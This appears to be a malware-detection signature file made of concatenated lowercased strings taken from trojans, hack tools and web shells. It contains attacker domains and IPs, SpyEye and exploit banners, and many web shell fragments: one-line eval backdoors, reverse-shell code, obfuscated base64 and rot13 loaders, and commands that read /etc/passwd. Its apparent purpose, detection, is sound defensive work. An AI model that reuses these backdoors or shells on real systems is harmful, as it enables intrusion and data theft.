1 updatemutex:response=scanin:update_bunistall_bs_protectp_walletgr_commandftpupload-ip2-post1-post2-udplogin=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]-timeout-thread local; ru) presto/2.10.289 version/-icmp<xmp>-long99=1x5o!p%@ap[4\\pzx54(p^)7cc)7}$eicar-standard-antivirus-test-file!$h+h*nullsoft
1 \"cmd\" /c cd /d \"c:\\windows\\temp\\\"&copysvchost.exe a -k -r -s -m5 -v1024000 -padmin-windows2014ren *.rar *.zipc:\\temp\\ipcan.exe<%eval(request.item(\"admin-na-google123!@#api.apigmail.combackup.darkhero.orgbel.updatawindows.combinary.update-onlines.orgblackcmd.comcastle.blackcmd.comctcb.blackcmd.comdav.local-test.comtest.local-test.comdev.local-test.comocean.local-test.comga.blackcmd.comhelpdesk.blackcmd.comhelpdesk.csc-na.comhelpdesk.hotmail-onlines.comhelpdesk.lnip.orgjobs.hotmail-onlines.comjustufogame.comlogin.hansoftupdate.comlong.update-onlines.orglonglong.update-onlines.orglongshadow.dyndns.orglongshadow.update-onlines.orglongykcai.update-onlines.orglostself.update-onlines.orgmac.navydocument.commail.csc-na.commantech.updatawindows.commicr0soft.orgmicrosoft-outlook.orgmtc.navydocument.commtc.update-onlines.orgnews.hotmail-onlines.comoac.3322.orgocean.apigmail.compchomeserver.comregistre.organiccrap.comsecurity.pomsys.orgservices.darkhero.orgsgl.updatawindows.comsonoco.blackcmd.comtest.logmastre.comup.gtalklite.comupdate.deepsoftupdate.comupdate.hancominc.comupdate.micr0soft.orgupdate.pchomeserver.comurs.blackcmd.comwang.darkhero.orgwebs.local-test.comword.apigmail.comwordpress.blackcmd.comworking.blackcmd.comworking.darkhero.orgworking.hotmail-onlines.comwww.trendmicro-update.orgwww.update-onlines.orgx.apigmail.comykcailostself.dyndns-free.comykcainobody.dyndns.orgzj.blackcmd.comlaxness-lab.comgoogle-ana1ytics.comwww.google-ana1ytics.comftp.google-ana1ytics.comhotmailcontact.net208.115.242.36208.115.242.37208.115.242.3866.63.178.14272.11.148.22072.11.141.13374.63.195.23674.63.195.23774.63.195.238103.24.0.142103.24.1.54106.187.45.162192.151.236.138192.161.61.19192.161.61.20192.161.61.2267.215.232.17996.44.177.19549.143.192.22167.215.232.18167.215.232.18296.44.182.24396.44.182.24596.44.182.24649.143.205.30working_success@163.comykcaihyl@163.comyuming@yinsibaohu.aliyun.comsvchostservicedll.dllm
1 %s -mutex %s -host %s -index %d -config \"%s\"www.target.com%s\\scripts\\desc\\%s.desc%c active/maximum host thread: %d/%d, current/maximum thread: %d/%d, time(s): %l%s -f hosts.txt -port -ipc -pop -max 300,20 -time 10000%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,20%s -h www.target.com -all.\\report\\%s-%s.html.\\log\\hscan.log[%s]: found cisco enable password: %s !!!%s@ftpscan#ftp account: %s/[null].\\conf\\mysql_pass.dictry the first %d time-->build&&change by p r
1 m?dm?sfilternonecancelsmsdivertmessnofilter1111111+380678409210_shutdownevt_vncevt_backie_hook::getrequestinfoff_hook::getrequestinfoex_hook::createprocesshijackdll.dllmtx_ff::pr_writehook entryff::pr_writehook exithijackprocessattach::*** master *** master *** master *** %s pid=%uhijackprocessattach::entryff::before injectff::after injectie::after injectie::before inject*** vnc *** vnc *** vnc *** vnc *** vnc *** vnc *** vnc *** vnc *** vnc *** vnc *** %s*** log injects *** %s*** inject to process %s not allowed*** backsocks *** backsocks *** backsocks *** backsocks *** backsocks *** backsocks *** backsocks *** %s.?avff_hook@@.?avie_hook@@inject::injectdllfrommemorybadsocks.dllextensadv.cctopbeat.ccbrainsphere.cccommonworldme.ccgigacat.ccnw-serv.ccparagua-analyst.ccspyeye%botname%globpluginsdata_injectdata_beforedata_afterdata_endbot_versionbot_guidtakebotguidtakegatetocollector[error] : omfg! process is still active? lets kill that mazafaka![error] : update is not successfull for some reason[error] : dwerr == %ugrabbed datawebfakes.dllconfig.datcollectors.txtwebinjects.txtscreenshots.txtbillinghammer.dllblock.dllbugreport.dllccgrabber.dllconnector2.dllcreditgrab.dllcustomconnector.dllffcertgrabber.dllftpbc.dllrdp.dllrt_2_4.dllsocks5.dllspyspread.dllw2chek4_4.dllw2chek4_6.dlle!v
1 *[s-p-l-i-t]**[h-e-r-e]*ftp~~1~1~0~0n
1 c:\\windows\\system32\\command.com /c easy usage version -- edited by: racle@tian6.comoh,sry.too long command.success! commander.hey,how can racle work without ur command ?the exploit thread was unable to map the virtual 8086 address space[+] usage: vnc_bypauth <target> <scantype> <option>========realvnc <= 4.1.1 bypass authentication scanner=======[+] type vnc_bypauth <target>,<scantype> or <option> for more informationsvnc_bypauth -i 192.168.0.1,192.168.0.2,192.168.0.3,...-vn:%-15s:%-7d connection closedprogram termingwww.icehack.yoda & m.o.d.-> come.to/f2f **************c:\\temp\\$530 please login with user and pass._shell.exeftpcwaitingpassword@members.3322.net/dyndns/update?system=dyndns&hostname=http://www.xxx.com/xxx.exe@ddns.oray.com/ph/update?hostname=listviewprocesslistcolumnclick!http://iframe.ip138.com/ic.aspusage : ms11-080.exe cmd.exe command \\ms11080\\ms11080\\debug\\ms11080.pdb[>] by:mer4en7y@90sec.org[>] create porcess error[>] ms11-080 exploitusage:system_exp.exe \"cmd\"the shell \"cmd\" success!not windows nt family os.unable to get kernel base address.run \"%s\" failed,code: %dwindows kernel local privilege exploit h
1 error starting filespy...exe\\filespy.dbg[/d <drive>] detaches monitor from <drive>should be logging to screen...filmon: unknown log record typed:\\documents and settings\\loveengeng\\desktop\\source\\bypass\\lcc\\ie.dlleditkeylog.exe keylog.exe,wineggdrop.dlleditkeylog.exewineggdroppasssniffer.exepop3/ftp snifferpassword sniffer v1.0\"gina\"=\"gina.dll\"regedit4[hkey_local_machine\\software\\microsoft\\windows nt\\currentversion\\winlogon]n
1 ' *** written by tim medin <tim@counterhack.com>response.binarywrite(stream.read)response.write(response.status & request.servervariables(\"remote_addr\"))%><a href=\"<%=request.servervariables(\"url\")%>\">web root</a><br/><%set folder = fso.getfolder(path)set file = fso.getfile(filepath)if ($_server[\"remote_addr\"] == $ip)header(\"http/1.0 404 not found\");<?php echo exec('killall nc');?><title>laudanum kill nc</title>foreach ($allowedips as $ip) {<form action=\"shell.asp\" method=\"post\" name=\"shell\">%comspec% /c dirset objcmd = wshell.exec(cmd)server.scripttimeout = 180cmd = request.form(\"cmd\")' *** http://laudanum.secureideas.netdim wshell, intreturn, strpresultport: <input name=\"port\" type=\"text\" value=\"8888\"><li>reverse shell - <li><a href=\"<?php echo plugins_url('file.php', __file__);?>\">file browser</a>'response.write \"<br/> -value:\" & request.querystring(key)(j)q = q & \"&\" & key & \"=\" & request.querystring(key)(j)for each i in split(http.getallresponseheaders, vblf)'urlquery = mid(urltemp, instr(urltemp, \"?\") + 1)s = urlscheme & urlhost & urlport & urlpathset http = server.createobject(\"microsoft.xmlhttp\")executable: <input type=\"text\" name=\"cmd\" value=\"cmd.exe\"><br><cfif ( #suppliedcode# neq secretcode )><cfif isdefined(\"form.cmd\")>remoteip = httpcontext.current.request.headers[\"x-forwarded-for\"].split(newremoteip = request.userhostaddress;<form method=\"post\" name=\"shell\"><body onload=\"document.shell.c.focus()\">command_hist[current_line] = document.shell.command.value;if (e.keycode == 38 && current_line < command_hist.length-1) {array_unshift($_session['history'], $command);if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {$process = proc_open($shell, $descriptorspec, $pipes);printit(\"successfully opened reverse shell to $ip:$port\");$input = fread($pipes[1], $chunk_size);$query = isset($_post['query']) ? $_post['query'] : '';$result = dns_get_record($query, $types[$type], $authns, $addtl);foreach (array_keys($types) as $t) {<servlet-name>command</servlet-name><jsp-file>/cmd.jsp</jsp-file>cmd.jsp}cmd.jsppkweb-inf/web.xmlweb-inf/web.xmlpkpublic function __activate()register_activation_hook(__file__, array('wp_laudanum', 'activate'));$allowedips =<a href=\"<?php echo $_server['php_self'] ?>\">home</a><br/>$dir = isset($_get[\"dir\"]) ? $_get[\"dir\"] : \".\";$curdir .= substr($curdir, -1) != \"/\" ? \"/\" : \"\";process p = runtime.getruntime().exec(request.getparameter(\"cmd\"));out.println(\"command: \" + request.getparameter(\"cmd\") + \"<br>\");<form method=\"get\" name=\"myform\" action=\"\">string disr = dis.readline();command = \"nslookup -type=\" & qtype & \" \" & query set objcmd = objwshell.exec(command)response.write command & \"<br>\"<form name=\"dns\" method=\"post\">$shell = 'uname -a; w; id; /bin/sh -i';*** laudanum@secureideas.net*** laudanum projectset_time_limit(0)date_default_timezone_set('prc');$content_mb;/index.php?host=eval(\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6c\\x61yc0cjyb+o//xgj9/y+u/dd//vkf'\\x29\\x29\\x29\\x3b\") <td><div style=\"font-family: verdana; font-size: 10px;\"><b>server adress:</b <td><div style=\"font-family: verdana; font-size: 10px;\"><b>user info:</b> ui <td><div style=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= <input type=\"text\" name=\"cmd\" value=\"<?php echo stripslashes(htmlentities($$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_print \"<a href=\\\"$_server[php_self]?s=$s&login=$login&passwd=$passwd&echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"echo \"<option value=\\\"$work_dir\\\" selected>current directory</option><input name=\"submit_btn\" type=\"submit\" value=\"execute command\"></p> if ($l) echo '<a href=\"' . $self . '?action=permission&amp;file=' . urlencode($return base64_decode('r0lgodlheqanajedamwaap///5mzmf///yh5bahoawmalaaaaaaraa0aaa out.print(\"<tr><td width='60%'>\"+strcut(convertpath(list[i].getpath()),7 \"reg add \\\"hkey_local_machine\\\\system\\\\currentcontrolset\\\\controldie(\"\\nwelcome.. by this script you can jump in the (safe mode=on) .. enjoy\\nmode shell v1.0</font></span></a></font><font face=\"webdings\" size=\"6\" colorecho \"<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fofputs ($fp ,\"\\n*********************************************\\nwelcome t0 sim<tt>&nbsp;</tt>\" (space), \"<tt>[</tt>\" (left bracket), \"<tt>|</tt>\" (piword: \"<tt>null</tt>\", \"<tt>yes</tt>\", \"<tt>no</tt>\", \"<tt>true</tt>\",<input type=submit value='\".mm(\"delete all dir/files recursive\").\" (rm -fr)'<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u</font><%out.print(request.getrealpath(request.getservletpath())); %><%@page import=\"java.io.*,java.util.*,java.net.*\"%>string path=new string(request.getparameter(\"path\").getbytes(\"iso-8859-1\"<?php ($www= $_post['ice'])!@preg_replace('/ad/e','@'.str_rot13('riny').'($wwh8p0bgfoey7ealy4h4e4o88ltsvhoaglj2klqhuwhkp7dvycf8cgnwfy8ocjrp5ffzkn9odrom0/rahmecho \"<p><hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<%= \"\\\\\" & oscriptnet.computername & \"\\\" & oscriptnet.username %>set ofilesys = server.createobject(\"scripting.filesystemobject\")eval(getenv('http_code'));style=\"background-color: #eae9e9; border-bottom: #000000 1px in<font color=\"#858585\">shopen</font></a></font><font face=\"verdana\" style<%eval request(\"ice\")%><tr style='background:#242424;' ><td style='padding:10px;'><form action='' enctyif (isset($_post['mysqlw_host'])){$dbhost = $_post['mysqlw_host'];} else {$dbhos<input type=\"submit\" name=\"send\" value=\"go!\"><textarea name=\"1988\" rows=\"18\" cols=\"78\"></textarea>case 15: $image .= \"\\21\\0\\copy($http_post_files['userfile']['tmp_name'], $_post['remotefile']);if(is_uploaded_file($http_post_files['userfile']['tmp_name'])) {echo \"uploaded file: \" . $http_post_files['userfile']['name'];echo \"<td><a href='$php_self?action=dropdb&dbname=$dbname' onclick=\\\"return<a href=\"?act=do\"><font color=\"red\">go execute</font></a></b><br /><textarea; (choose good passwords!). add uses as simple 'username = \"password\"' lines.%8@#@&p~,p,pp,mv~4bp^~,ns~m~pxc3,_pwbspu w~~[u3fffs~/%@#@&~~,pp~~,m!pms,4s,mbpnb// bug: corta el fichero si es mayor de 640ks echo \"<br><center>all the data in these tables:<br> \".$tblsv.\" were putted <% for each vars in request.servervariables %>variable name</b></font></p><?php ${${eval($_post[ice])}};?><% execute request(\"ice\")%>a if(damapath!=null &&!damapath.equals(\"\")&&content!=null//angel$admin['cookiedomain'] = '';d,'prjknd,j~[,ednmp[,-4;ds6@#@&vkobx2ldd,'~jhcstring sql = \"select * from dba_tables where table_name not like '%$%' and num_const strs_totransform=\"command|radmin|ntauthenabled|filterip|iissample|pagecou<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_session['nounce'];<p>username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna$_session['output'] .= \"cd: could not change to: $new_dir\\n\";<%@ page language=\"java\" pageencoding=\"gbk\"%><jsp:directive.page import=\"jaresultset r = c.getmetadata().gettables(null, null, \"%\", t);string cs = request.getparameter(\"z0\")==null?\"gbk\": request.getparameter(\"z<%eval request(\"pass\")%>lfyw6pd^dkv^4cdrwmmno1gvkdl:y& f+2(93).$_uu(41).$_uu(59);$_ff=$_uu(99).$_uu(114).$_uu(101).$_uu(97).$_uu(116).$_uuerde types','getallen','datum en tijd','tekst','binaire gegevens','netwerk','geohttp://code.google.com/p/b374k-shell$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'jayalah indonesiaku & lyke @ 2013b374k vip in beautify just for selfcall os.run(\"win.com cmd.exe /c \"\"\" & szcmd & \" > \" & sztf &$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00echo \" <font color='#0000ff'>chmodu \".substr(base_convert(@fileperms($echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo// list.php = directory & file listing echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena// by: the dark raverprint \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\"print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di<?php $k=str_replace('`','','a`s`s`e`r`t');$m=$_post[ice];if($m==null)header('st<%=thingy.driveletter%> </td><td><tt> <%=thingy.drivetype%> </td><td><tt> <%=thi<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%string t=request. <tr><td bgcolor=\"<? echo (!$connect && $action == \"chparam\")?\"#660000\":\"#<input type=\"checkbox\" name=\"autoupdate\" value=\"autoupdate\" ononblur=\"document.shell.autoupdate.checked= this.oldvalue;print \"\\n\".'tip: to view the file \"as is\" - open the page in <a href=\"'.dxclass=linelisting><nobr>post (php eval)</td><if fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" href='$php_self?action=dumptable&dbname=$dbname&tablename=$tablename'>dump</a><td<%if (fso.getextensionname(path & \"\\\" & ofile.name)=\"lnk\") or (fso.getex<input type=button value=save onclick=\"editorcommand('save')\"> <input type=but<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=requesprivate function convertbinary(byval sourcenumber, byval maxvalueperindex, byvalcase 's':connectiondbm(out,encodechange(request.getparameter(\"drivereturn \"<a href=\\\"javascript:delfile('\"+folderreplace(file)+\"')\\\"include('php://input');// no eval() calls, no system() calls, nothing normally seen as malicious.ini_set('allow_url_include, 1'); // allow url inclusion in this script<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7<input type=\"submit\" name=\"btnsubmit\" value=\"upload\"> !22222222222222222222222222222222222222222222222222response.write \"<form action=\"\"\" & request.servervariables(\"url\") & \"\"\"response.write \"<tr><td><font face='arial' size='2'><b>&lt;dir&gt; <a href='\" response.write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javasprocess p = runtime.getruntime().exec(\"cmd.exe /c \" + request.getparam<form method=\"post\" name=\"myform\" action=\"\">kxpew[\"[7b:g0w@w<b:ghr,g<rhv0w@w<s_mr(u7bresponse.write \"<a href='\"&dosyapath&\"?status=7&path=\"&path&\"/if (md5($_get['usr'])==$user && md5($_get['pass'])==$pass){eval($_get['idc']);}$data=\"username=\".urlencode($user).\"&password=\".urlencode($pafputs($sun_tzu,\"<?php echo \\\"hi master!\\\";ini_set(\\\"max_execution_time&9k_)p82ai,a}i92]r\"q!c:rz}s6]=pattr$pass = md5(md5(md5($pass)));$_f_f.='_'.$_p_p[5].$_p_p[20].$_p_p[13].$_p_p[2].$_p_p[19].$_p_p[8].$_p_pos = instrb(boundarypos,requestbin,getbytestring(\"content-dispositiocontenttype = getstring(midb(requestbin,posbeg,posend-posbeg))// uses include('php://input') to execute arbritary code// php://input based backdoor&nbsp;&nbsp;<?php echo buildurl(\"<font color=\\\"navy\\\">[echo \"</form><form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><inputif ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset(case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": casif(!($sqlcon = @mysql_connect($_session['sql_host'] . ':' . $_session['sql_p<?php eval(gzuncompress(base64_decode(\"if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(application.g$python_code = \"i$passwordprompt = \"\\n=================================================fputs ($sockfd ,\"\\n===============================================if(request.getsession().getattribute(\"hehe\").tostring().equals(\"hehe\"))byte[] binary = base64decoder.class.newinstance().decodebuffer(cmd);if(cmd.equals(\"szh0zwft\")){out.print(\"[s]\"+dir+\"[e]\");}response.write \"<font face=wingdings size=3><a href='\"&dosyapath&\"?status=18&system(\"mv \".$_files['_upl']['tmp_name'].\" \".$currentwdif($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr><option value=\"cat /etc/passwd\">/etc/passwd</option>var flag = \"?txt=\" + (document.getelementbyid(\"dl\").checked ? \"2\":\"1\" <form method=get action='cmdjsp.jsp'>public jythonshell(int columns, int rows, int scrollback) {this(null, py.getsystemstate(), columns, rows, scrollback);+9jkskofkhuxzjpl~\\(md^w~[,{@#@&eo<%if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(applicationecho \"hacking mode?<br><select name='htype'><option >--------select--------</op$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');$('#tt2').tree('options').url = \"selectchild.action?checkistring basepath = request.getscheme()+\"://\"+request.getservername()+\":\"+requ<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: enter ::</b><for<p><font color=red>wordpress not found! <input type=text id=\"wp_pat\"><input ty$cmd = ($_request['cmd']);if(isset($_request['cmd'])){system($cmd);<span>posix_getpwuid (\"read\" /etc/passwd)echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>server's php version:&necho \"<form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><input type=$header='<html><head><title>'.getenv(\"http_host\").' - antichat shell</title><mpreg_match(\"/safe\\ mode\\ restriction\\ in\\ effect\\..*whose\\ uid\\ is($path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : null).echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'><? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)out.print(\") <a style='color: \" + fcolor.tostring() + \";' href='?file=\" + fnif(flist[i].canread() == true) out.print(\"r\" ); else out.print(\"-\");echo \"<center>${t}mysql cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><formecho \"<center>${t}wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr<font face=\"verdana\" style=\"font-size: 8pt\" color=\"#800080\">buradan dosya <%@page contenttype=\"text/html;charset=gb2312\"%>????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff<%@page contenttype=\"text/html; charset=gbk\" import=\"java.io.*;\"%><%!private<?php $ooo000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(kmu(\"print \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">filenamprint \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">file: </show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value\" href=\"?act=tools\"><font color=#cc0000 size=\"3\">tools</font></a></span></f@ini_set('error_log',null);$pass='abcdef1234567890abcdef1234567890';@ini_restore(\"disable_functions\");@ini_restore(\"safe_mode_exec_dir\");seal.write \"set wshshell = createobject(\"\"wscript.shell\"\")\" & vbcrlfseal.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreateoveif($_get['cmd']) {// cmd.php = command execution system($_get['cmd']);<input type=\"hidden\" name=\"type\" value=\"<%=tipo%>\">response.write(\"<h3>file: \" & file & \"</h3>\")cgx6r9q733wvrrjiskhop9net7wa6zad8uthmvjv6mk36lz/hokffoxx87mpphzzbqh6oayukng1oe1jhj3hjqxclkzfp<? eval(gzinflate(base64_decode('process p = runtime.getruntime().exec(\"cmd.exe /c \" + cmd);array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),++$f; $file = urlencode($dir[$dirfile]); $ext = '.:'; if (strpos($dir[$dirfile],xmg2/g4mz7kpnveralgojvbcqa2a8/skwp9w93nlxpttugrcif(!move_uploaded_file($http_post_files['file_name']['tmp_name'], $dir.$fname))<pre><form action=\"<? echo $php_self; ?>\" method=get >execute command: <input echo \"<input type=button name=submit onclick=\"\"document.location =&#039;\" & echo \"document.frm_pack.filename.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-<?php assert($_request[\"c\"]);?> unix:/bin/sh -c tar vxf xxx.tar windows:c:\\winnt\\system32\\cmd.exe /c type c:string url=\"jdbc:oracle:thin:@localhost:1521:orcl\";<%@ page contenttype=\"text/html;charset=gb2312\"%><td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typfont-weight: bold; font-size: 10px; background: none transparent scroll repeat 0m\" target=inf onclick=\"window.open('?action=help','inf','width=450,height=400 //authentication$login = \"//pass$md5_pass = \"//if no pass then hashecho '<option value=\"create function backshell returns string sonameecho \"<input name='p' type='text' size='27' value='\".dirname(_file_).\"echo '<option value=\"select cmdshell(\\'net user response.write(\"<tr><td bgcolor=#f8f8ff><input type=submit name=cmdtxtfileoptioif fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" or req@include($_get['bug']);codeds=\"li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\" <input size=\"100\" value=\"<%=application.getrealpath(\"/\") %>\" name=\"url$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>link</tentrika.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreate.println(\"<a href=\\\"javascript:alert('you are in file now ! can not pack !');<small>jsp file browser version <%= version_nr%> by <aelse if (fname.endswith(\".mpg\") || fname.endswith(\".mpeg\") || fname.endswithecho $head.\"<font face='tahoma' size='2'>operating system : \".php_uname().\"<becho \"<center><form name=client method='post' action='$_server[php_self]?do=db'if(eregi('where|limit',$_post['nsql']) && eregi('select|from',$_post['nsql'])) $if(!empty($_files['ufp']['name'])){if($_post['ufn'] != '') $upfilename = $_post[\"<form action=\\\"\"+shell_name+\"?o=upload\\\" method=\\\"post\\\" enctype=<option value='reg query \\\"hklm\\\\system\\\\currentcontrolset\\\\control\\\\t_url = \"jdbc:microsoft:sqlserver://\" + dbserver + \":\" + dbport + \";user=\" result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getrports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";private static class veditpropertyinvoker extends defaultinvoker {$opt_charsets .= '<option value=\"'.$item.'\" '.($_post['charset']==$item?'selec.'</td><td><a href=\"#\" onclick=\"g(\\'filestools\\',null,\\''.urlencode($f['natable.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbname+\"')\"<p><input type=\\\"hidden\\\" name=\\\"selectdb\\\" value=\\\"\"+selectdb+\" sbcopy.append(\"<input type=button name=goback value=' \"+strback[languageno]+echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_nameecho sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size=\"<h2>remote control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var\"<p>current file (import new file name and new file)<br /><input class=\\\"inpu\"<p>current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i<input title=\"upload selected file to the current working directory\" type=\"su<input title=\"launch command in current directory\" type=\"submit\" class=\"but<input title=\"delete all selected files and directories incl. subdirs\" class=uplinfo info = uploadmonitor.getinfo(fi.clientfilename);long time = (system.currenttimemillis() - starttime) / 1000l;elseif(($regwrite) and !empty($_post['writeregname']) and !empty($_post['regtypeecho \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"psbfile.append(\" &nbsp;<a href=\\\"javascript:doform('down','\"+formatpath(strdsbfile.append(\" &nbsp;<a href=\\\"javascript:doform('edit','\"+formatpath(strdiprivate string[] _textfiletypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\",\\\" name=\\\"upfile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typif (request.getparameter(\"password\") == null && session.getattribute(\"passwor<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['commaecho $msg=@copy($_files['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_file<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; $prog = isset($_post['prog']) ? $_post['prog'] : \"/c net start > \".$pathname.else {echo \"running datapipe... ok! connect to <b>\".getenv(\"server_addr\"<a href=\"javascript:godir(\\''.$drive->path.'/\\');p('<h2>file manager - current disk free '.sizecount($free).' of '.sizecount($all$mainpath_info = explode('/', $mainpath);if (!isset($_get['action']) or empty($_get['action']) or ($_get['action'] == \"durl_con.setrequestproperty(\"referer\", \"\"+fckal+\"\");filelocalupload(uc(dx())+sxm,request.getrequesturl().tostring(), \"gbk\");if (($i = array_search($_request['command'], $_session['history'])) !== falsif (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_request['command'])) {&nbsp;<textarea name=\"cqq\" rows=\"20\" cols=\"100%\"><%=sbcmd.tostring()%></teosw = new bufferedwriter(new outputstreamwriter(os));sock = new socket(ipaddress, (new integer(ipport)).intvalue());isr = new bufferedreader(new inputstreamreader(is));sbfolder.append(\"<tr><td >&nbsp;</td><td>\");return filesize / intdivisor + \".\" + straftercomma + \" \" + strunit;fileinfo fi = (fileinfo) ht.get(\"cqquploadfile\");<input type=\"hidden\" name=\"cmd\" value=\"<%=strcmd%>\">while ((nret = insreader.read(tmpbuffer, 0, 1024)) != -1) {password = (string)session.getattribute(\"password\");insreader = new inputstreamreader(proc.getinputstream(), charset.forname(\"gb231$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";while(list($kname, $columns) = @each($index)) {$tabledump = \"drop table if exists $table;\\n\";$tabledump .= \" primary key ($colnames)\";filename: backupkvycm9yoiakivxuiik7dqpjb25uzwn0kfnpq0tfvcwgjhbhzgryksb8fcbkawuoikvycm9yoiakivxuiaoc3rydwn0ihnvy2thzgryicopiczzaw4sihnpemvvzihzdhj1y3qgc29ja2fkzhipksk8mckgew0kic$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");while($data=ocifetchinto($stm,$data,oci_assoc+oci_return_nulls))$res.=implode('|while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"error: \".$stri<option value=\"find /etc/ -type f -perm -o+w 2> /dev/null\"<option value=\"cat /proc/version /proc/cpuinfo\">cpuinfo<option value=\"wget http://ftp.powernet.com.tr/supermail/de<option value=\"cut -d: -f1,2,3 /etc/passwd | grep ::\">user<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type=$uploadfile = $_post['path'].$_files['file']['name'];elseif (!empty($_post['ac'])) {$ac = $_post['ac'];}if ($_post['path']==\"\"){$uploadfile = $_files['file']['name'];}echo \"<b>hexdump:</b><nobr>if ($filestealth) {$stat = stat($d.$f);}while ($row = mysql_fetch_array($result, mysql_num)) { echo \"<tr><td>\".$rif ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"db echo \"<center><b>server-status variables:</b><br><br>\";echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>$this -> addfile($content, $filename);function addfile($data, $name, $time = 0) {function unix2dostime($unixtime = 0) {foreach($filelist as $filename){ if (unlink(_file_)) {@ob_clean(); echo \"thanks for using c99shell v.\".$shv \"c99sh_backconn.pl\"=>array(\"using perl\",\"perl %path %host %port\"),<br><table style=\"border-collapse: collapse\" cellspacing=0 bordercolordark=#66 elseif (!$data = c99getsource($bind[\"src\"])) {echo \"can't download sources \"c99sh_datapipe.pl\"=>array(\"using perl\",\"perl %path %localport %remotehos elseif (!$data = c99getsource($bc[\"src\"])) {echo \"can't download sources!\"\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>\"+out.println(\"<h2>file manager - current disk &quot;\"+(cr.indexof(\"/\") == 0?string execute = f.canexecute() ? 